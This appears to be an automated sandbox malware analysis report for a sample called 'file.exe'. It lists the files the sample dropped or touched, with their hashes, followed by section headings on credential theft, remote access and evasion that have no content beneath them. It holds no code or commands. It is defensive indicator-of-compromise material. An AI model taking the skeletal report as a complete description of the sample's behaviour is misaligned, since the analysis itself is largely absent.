C:\ProgramData\Microsoft\Windows\WER\Temp\WER5EA4.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	E44DA4B571A68E0F061DE1A4CC8106B3	58973A7AFCC410DD3AB8EBE5914A21668925031E	ACA4ECE86514EC1AD8EA9C85C3A80162126E2EE4A85807202FE6CD290F083DCA
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators	937AF9CA5D9AE8BBA7A1DEEAC1B5FE56	E9C04993C99B7F1561C2924D42C684BAB531035A	2A6E3726D57F9C4BAF90A11009715C9748419F62EB3C7B9ADA420A72F25985EF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	49504D08DC10AECA7D36605D6A20BDE0	BB6CBFC6EF07C8EE1F287F3BE5690D0FFA5AC9EA	A6B03FCC5F34E1A4546A92C1B6CCC6ED2DDC92965437D0BB64D4F0E515E22C0E
C:\Users\user\AppData\Local\Temp\delays.tmp	EBCDIC text, with very long lines (65536), with no line terminators, with overstriking	6C37C81FBB253DEA370A9BB1B013084A	AF9E05215B75BE7D5636DBA75793319833F5A67A	F0CBC300DFD548B8CFB6764348F28F318A379AE04B177140E86976230BDADF53
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	744F9BC57AF1580E267ADF1A38AD0162	44BDA3C017753B8924B92355F4D483E8C0A48A0B	EEDB51D326933F1AC2B7F26253A6834452E04ACB8A9257E8DEF034C08DE37105

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by